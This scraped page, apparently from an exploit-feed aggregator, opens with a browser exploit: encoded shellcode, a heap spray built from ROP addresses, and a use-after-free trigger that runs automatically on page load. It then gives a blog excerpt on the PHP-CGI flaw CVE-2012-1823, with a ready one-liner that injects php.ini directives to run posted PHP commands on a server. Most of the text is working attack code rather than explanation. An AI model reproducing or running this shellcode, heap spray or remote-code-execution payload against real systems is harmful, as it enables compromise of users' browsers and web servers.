var shellcode = unescape("%u9090%u9090%ucbb5%u7852%u9090%u9090%u11eb%u"+"4a5a%uc933%u8166%uE3c1%u8007%u0a34%ue296%uebfa%ue805%uffea%uffff%u7ef6%u9696%u9696%u17cb%u857b%ud686%u1d96%u1b63%uc310%ud683%uc696%ud67e%u9692%u1b96%ud010%ud683%uc696%ua27e%u9692%u1b96%u3010%ud683%uc696%ube7e%u9692%u1b96%u5910%ud683%uc696%u8a7e%u9692%uc096%u97fc%u3b7e%u9694%uc096%u94fc%u337e%u9694%uc096%u95fc%u0b7e%u9694%uc096%u92fc%u037e%u9694%uc096%uac7e%u9697%ufc96%u6996%ue800%ud683%uf796%uc355%u7a1d%u5215%u1d6a%u9ed3%ud31f%ua56a%ucf56%uaf16%ue296%ud692%u7dd7%u5f61%u9254%uc396%u7a1d%ue369%u7e9e%u694f%u6969%ud397%u1d9e%u9ae3%ueb1d%u699e%u9ae3%u5e7e%u6969%u1d69%u155e%u9757%u3265%u545f%u969e%u1dc3%uc17a%ueb1d%u139e%ue269%u1dbe%u9ac3%u4413%ub7e2%u1dc0%u86e3%u501d%u13d8%u1d56%ue059%ubd9a%ud041%u921c%u1e87%ud797%ue3d8%u1d61%uc851%u5fc9%u9a54%ua596%uc956%u545f%u969a%u1dc3%u1d7a%u9ee3%u101b%u8100%u96d6%u69c6%u1c00%ud683%ufc96%uc6f3%u0069%u8318%u96d6%u4669%u545f%u9692%u1dc3%u157a%u6252%ue31d%uf69e%ucb1b%uc56a%ud6fc%uf2fc%u101d%u83db%u96d6%u69c6%u1000%ud683%uf796%u101d%u83db%u96d6%ud31f%u1d62%u9350%u8709%u96d6%ud3bd%u1562%u937e%ud31f%uf66e%u97fc%u081b%u8193%u96d6%u1dc5%udb10%ud683%uc696%uc37e%u6969%uf769%ufcf6%u1b92%u6ed3%u1dc6%udb10%ud683%u1596%u9756%u7ec6%u69a8%u6969%u1bf7%ue810%ud683%ufc96%uc692%u092e%ud687%u9596%u1550%u9556%u7ec6%u69b2%u6969%u545f%u9692%u96fc%u962e%u9696%u6996%u5f46%u9254%uc396%u7a1d%u5215%u1d7a%u9ee3%u92fe%u9697%ufc96%u69d6%u1400%ud683%u1f96%u6ad3%ufec6%u9792%u9696%u0069%u83ec%u96d6%u1bf6%u1a08%ud681%uc596%ue369%u7e6a%u6821%u6969%u69f7%u6ae3%u0069%u83c8%u96d6%u96fc%u96fc%ue369%u1b6a%ub908%ud683%uc596%u96fc%u0069%u8340%u96d6%u569d%u1399%u9662%u9696%u96fc%u96fc%u95fc%u96fc%u95fc%u95fc%ue369%u696a%uf000%ud683%u1f96%u6ed3%ueb15%u966e%u1299%u9644%u9696%u96fc%ue369%u696e%uf400%ud683%u1f96%u62d3%ueb17%uf662%u967c%u9996%u2110%u9696%u1796%u62eb%uc906%u9697%u1599%u963c%u9696%ue369%ufc62%u69d6%u1400%ud683%u1f96%u66d3%ud351%u967a%u9696%ufc96%u1b96%u7ad3%u69c6%u62e3%ue369%u6966%u6ee3%u0069%u83f8%u96d6%u569d%ueae2%u1df6%u62db%ud31d%u1c66%u1686%ub254%u6416%u1e4a%ud686%ue3df%uf764%u96fc%u96fc%u96fc%ue369%u696e%u0000%ud683%u1596%u696e%uc4e2%u96fc%ud351%u967a%u9696%u1b96%u7ad3%u69c6%u62e3%ue369%u6966%u6ee3%u0069%u83e4%u96d6%u569d%ua4e2%ue369%u696e%ufc00%ud683%ufe96%u9146%u9696%u0069%u8304%u96d6%ue369%u696a%u1c00%ud683%u1596%u966e%u71e2%u081b%u8134%u96d6%uc6c5%u0069%u8318%u96d6%u4669%u545f%u9692%u1dc3%u157a%u4652%ue31d%ufe9a%u9792%u9696%ud6fc%u0069%u8314%u96d6%ud31f%u1b6a%u6ed3%ufec6%u968f%u9694%u96fc%ueb15%u979e%u90e3%u101b%u8348%u96d6%ueb15%u949e%u90e3%u101b%u8361%u96d6%ueb15%u959e%u90e3%u101b%u8081%u96d6%ueb15%u929e%u90e3%u101b%u80a9%u96d6%ufec6%u9694%u1696%u0069%u8339%u96d6%ueb15%u979e%u90e2%ueb15%u949e%u93e3%u1e7f%u9696%u1596%u9eeb%ue395%u9db4%ue356%ufc88%u1b96%uc108%ud681%uc596%u0069%u83e0%u96d6%u96fc%u081b%u81e4%u96d6%u69c5%ue000%ud683%u1596%u9eeb%ue392%u9dc0%ue356%ufec4%u96a9%u9699%u96fc%u96fc%u0069%u832d%u96d6%u569d%ua9e2%ub2fc%u081b%u819a%u96d6%uc6c5%u0069%u8329%u96d6%u569d%ubde2%ucb1b%uc546%u97fc%u69c6%u5500%ud683%ufc96%u1b96%ub308%ud681%uc596%u0069%u83e0%u96d6%u96fc%u081b%u81a9%u96d6%u69c5%ue000%ud683%u5f96%u9e54%u9d96%ue256%u5f90%u9e54%u7d96%u15f2%u9eeb%ue397%u1b90%uce08%ud680%u1596%u9eeb%ue394%u1b90%u3a08%ud680%uc596%u96fc%u97fc%u96fc%u0069%u830c%u96d6%u569d%u91e2%u69c6%u0800%ud683%u1596%u9eeb%ue397%u1b90%u0708%ud680%u1596%u9eeb%ue394%u1b90%u7208%ud680%uc596%u96fc%u97fc%u96fc%u0069%u830c%u96d6%u569d%u91e2%u69c6%u0800%ud683%u5f96%u9e54%uf696%ue21d%ub2b2%u017e%u9696%ufe96%u473b%ud7a2%u7ec6%u96b7%u9696%u69c0%u1d46%ubd4e%u3a56%u5612%u6de3%u681d%u133b%ue256%uc69c%u7ec5%u9691%u9696%u7d3d%uf767%u9254%uf696%ufa1d%ub2b2%ud31d%u1daa%ubec2%u95ee%u1d43%u8edc%ucc1d%u95b6%u754b%udfdf%ua21d%u951d%ua563%uf669%u401d%u56a5%u4661%u94a4%u9e25%u7e47%u93e5%ub6a3%u2e15%u687b%ue35d%u1665%u96ac%u95e2%u7dd4%u6171%u1f46%ub292%uadf7%ub2ea%ue3be%u1d5c%ub2cc%u4b95%u1df0%udd9a%ucc1d%u958a%u1d4b%u1d92%u5395%u947d%u56bd%ud21f%u8ab2%u54f7%u969e%ua5f6%uf256%ud61d%u13a6%uee56%u1d9a%u9ad6%ue61d%u3b8a%ud61d%u7d9e%u1d9f%ua2d6%ud61b%u1dea%uaad6%ud21f%u8ab2%u55f7%ue2fe%ue6e2%ub9ac%u9bb9%uf4fe%ub8a1%uf8ff%uf8b9%ue5b9%uf3b8%uf3ee%ue396%uf3e5%ua5e4%u96a4%u2d94%uf3dd%u9696%u9696%uf3fd%uf8e4%ufaf3%ua4a5%u4896%ub3f9%u8d48%ueb17%u4979%u1fbb%u0b1a%uf4dc%uccfe%u4ef7%u05c2%ue1e1%ud9b7%ud3ba%u0bbe%ubc7f%u1745%u63e7%u55d6%u35c5%u2d15%u5542%u3bef%ua247%u89d7%u5fea%u2c69%u57a0%ud49c%u130b%uef13%ucf29%u3580%u8976%u9697%u9696%uf796%ue0f2%ue6f7%ua5ff%u96a4%uc00f%u5b8f%u9fad%u1e21%u9439%u128e%u3bfa%uddef%u68fc%ubaf7%u6960%u894c%uc391%u5288%u9696%u9696%ue4e3%ufbfa%uf8f9%u8f96%u5542%u9604%u9696%uc596%ud0d9%uc1c2%uc4d7%ucad3%ud7ca%uf8fe%uf7da%ucaf4%uc0ca%udaa5%ue2ff%u96f3%ud9c5%uc2d0%ud7c1%ud3c4%ucaca%ufed7%udaf8%uf4f7%ucaca%ua5c0%ua5b6%ua3a0%ud5b6%ufffa%ufff8%u96f5%ud9c5%uc2d0%ud7c1%ud3c4%ucaca%uded8%ub6d8%uf9d5%ue6e4%ue4f9%ue2f7%uf9ff%ucaf8%ud8ca%ue0f7%ue4f3%uf7c0%uf5f5%uf8ff%u96f3%ud9c5%uc2d0%ud7c1%ud3c4%ucaca%uc5d3%ue5c2%uf0f9%ucae2%ud7ca%ucfda%uf5f7%ud196%uf9fa%uf7f4%ucafa%ua5c0%udfda%ud3c2%uedc9%ua5d7%ua6d7%ud3af%ua4d3%ua7bb%ua7d4%ubbd3%ua6a2%ua1a0%ud4bb%ua4a4%ubbd2%ua4a6%uafa0%ua2a7%ud4a0%ua6a7%ua6a6%uc9eb%udad7%u96da%ufad1%uf4f9%ufaf7%uc0ca%udaa5%uc2df%uc9d3%udfd0%udfd8%udec5%ud3c9%ud3c0%uc2d8%ud196%uf9fa%uf7f4%ucafa%ua5c0%ua0a5%uc9a3%ud7ed%ud7a5%uafa6%ud3d3%ubba4%ud4a7%ud3a7%ua2bb%ua0a6%ubba1%ua4d4%ud2a4%ua6bb%ua0a4%ua7af%ua0a2%ua7d4%ua6a6%ueba6%ud7c9%udada%ud196%uf9fa%uf7f4%ucafa%ua5c0%ua0a5%uc9a3%udfd0%udfd8%udec5%ud3c9%ud3c0%uc2d8%u2e96%u9696%u9696%u9696%u067f%u0606%u0606%ud796%uda96%ucf96%uf796%uf596%uc996%uc696%ucc96%uc596%ue496%ue096%u9696%u9696%ue2f8%uf2e5%ubbb6%ub6f5%ub6e7%ue6bb%ub6f8%ucfd7%uf1d7%uf8f3%ub8e2%ueff7%u96f3%ue2f8%uf2e5%ubbb6%ub6f5%ub6e7%ue6bb%ub6f8%udad7%uf7cf%ub8f5%ueff7%u96f3%ue2f8%uf2e5%ubbb6%ub6f5%ub6e7%ue6bb%ub6f8%uc0d8%ud7d5%uf3f1%ue2f8%uf8b8%uf5e6%uf896%ue5e2%ub6f2%uf5bb%ue7b6%ubbb6%uf8e6%ud8b6%uf7e5%ue5e0%uf5e0%uf8b8%uf5e6%uc096%udac5%ueff7%uf2b8%ufafa%uc596%uf2fe%uf5f9%ue1e0%uf2b8%ufafa%uff96%ufff8%u96e2%uc5b2%uf3fe%ufafa%uf9d5%uf3f2%uc2c9%uf3fe%uf8d3%ub2f2%u3a2e%u9691%uc696%u967e%u9696%u6996%u96b3%ud6b6%u9696%u9696%u9696%u9696%u9696%u9696%u9696%u9696%u9696%u9696%u9696%u9696%u9696%u9696%u9696%u9696%u9696%u9696%u9696%u96");

var heapspray =
int_to_hex(0x785863F6)
+ int_to_hex(0x7854F203)
+ int_to_hex(0x7C7D1AD4)
+ int_to_hex(0x785863F6)
+ int_to_hex(0x78590ABC)
+ int_to_hex(spraybase)
+ int_to_hex(0x3000)
+ int_to_hex(0x40)
+ int_to_hex(spraybase)
+ int_to_hex(0x7854F203)
+ int_to_hex(0x0a0a0220)
+ int_to_hex(0x78590ABC)
+ '11'
;

heapspray += int_to_hex(spraybase + 0x1F8 +4);

while (heapspray.length < 0x1F8/2)
{
heapspray += 'AA';
}

heapspray += int_to_hex(0x63f0575b); // virtual function 63f0575b

heapspray += shellcode;

function build_block(s)
{
var endtag = unescape("AA");

var len = 0x10000 - (s.length *2 + endtag.length * 2);
var b = "11";
while(b.length < len) b += b;
var block = b.substring(0, len / 2);
block = s + block + endtag;

var bigblock = "";
for (var i=0; i < 8; i++) bigblock += block;
bigblock = bigblock.substring(0, (0x80000-0x28)/2);

return bigblock
}


bigblock = build_block(heapspray);
var blocks = new Array();
for(var i = 0; i < 2 * 200; i++)
blocks[i] = [bigblock].join("");

function exploit()
{
var fakeobj = int_to_hex(spraybase) +
int_to_hex(0x0c0c0c0c) +
int_to_hex(0x63f01e13) +
int_to_hex(0x63F01100) +
int_to_hex(0x63f01ec4) +
int_to_hex(spraybase) +
int_to_hex(0x0c0c0c0c) +
int_to_hex(0x0c0c0c0c) +
int_to_hex(0x0c0c0c0c) +
int_to_hex(0x0c0c0c0c) +
int_to_hex(0x0c0c0c0c) +
int_to_hex(0x0c0c0c0c) +
unescape("%u0c0c%u3b3b") +
int_to_hex(0x0c0c0c0c) +
int_to_hex(0x0c0c0c0c) +
int_to_hex(0x0c0c0c0c) +
int_to_hex(0x0c0c0c0c) +
int_to_hex(0x0c0c0c0c) +
unescape("%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c");

var formobj, selobj, optobj;
selobj = document.getElementById("select1");
formobj = selobj.form;

var loopcount = 2;
bigarray = new Array();
for (var i=0; i<loopcount; i++)
{
var imgarray = new Array();
for(var j = 0; j < 500; j++) {
imgarray.push(document.createElement("img"));
}

bigarray.push(imgarray);
}

for (var k=0; k<loopcount; k++)
{
for(var i=0;i<5;i++) {
optobj = document.createElement('option');
optobj.text = "test";
selobj.add(optobj);
}

selobj.innerText = "foo";

for(var i = 0; i < bigarray[k].length; i++) {
bigarray[k][i].title = fakeobj.substring(0, 0x38 / 2 - 1);
}
               
formobj.reset();
}
alert('s');
}

</script>
</head>

<body onload='exploit()'>
<form method="post">
   <select id="select1">
</select>
</form>
<object classid="vvv.dll#GenericControl">
</body>
</html>


##eromang


//The information contained within this publication is

//supplied "as-is"with no warranties or guarantees of fitness

//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts

//responsibility for any damage caused by the use or misuse of

//this information

Exploit Development: PHP-CGI Remote Code Execution – CVE-2012-1823

December 27, 2012, 3:50 pm
$
0
0

The CVE-2012-1823 PHP-CGI exploit was, quite possibly, one of the most groundbreaking exploits of 2012. In a year that brought us MS-12-020 (the most hyped bug in my recollection), multiple Java 0day exploits, and several MySQL exploits, the PHP-CGI bug still stands out as one of the most hilariously brilliant bugs to show up for several reasons. Primarily the massive misunderstanding of how it worked.

For this exploit to work, PHP had to be running in CGI mode. A fairly obscure configuration not seen all too often in the wild. Essentially, with this vulnerability, you could inject arguements into the PHP-CGI binary and make changes to php.ini directives, allowing for remote code execution.

Developing an exploit for this bug is trivial. In order to gain remote code execution, you tell PHP.ini that it is to allow URL inclusion ( allow_url_include = 1 ), and to automatically prepend the “file” php://input. This means whatever we send in the POST request is parsed as PHP, and executed.

One way to exploit this (targetting example.com), using the lwp-request’s “POST” utility, is as follows.
echo “<?php system(‘id’);die(); ?>” | POST “http://example.com/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input”

As you will see in the video, we can easily use this to execute commands remotely from a BASH shell.

read more and view video.............http://insecurety.net/?p=705
Viewing all 8064 articles
Browse latest View live
Search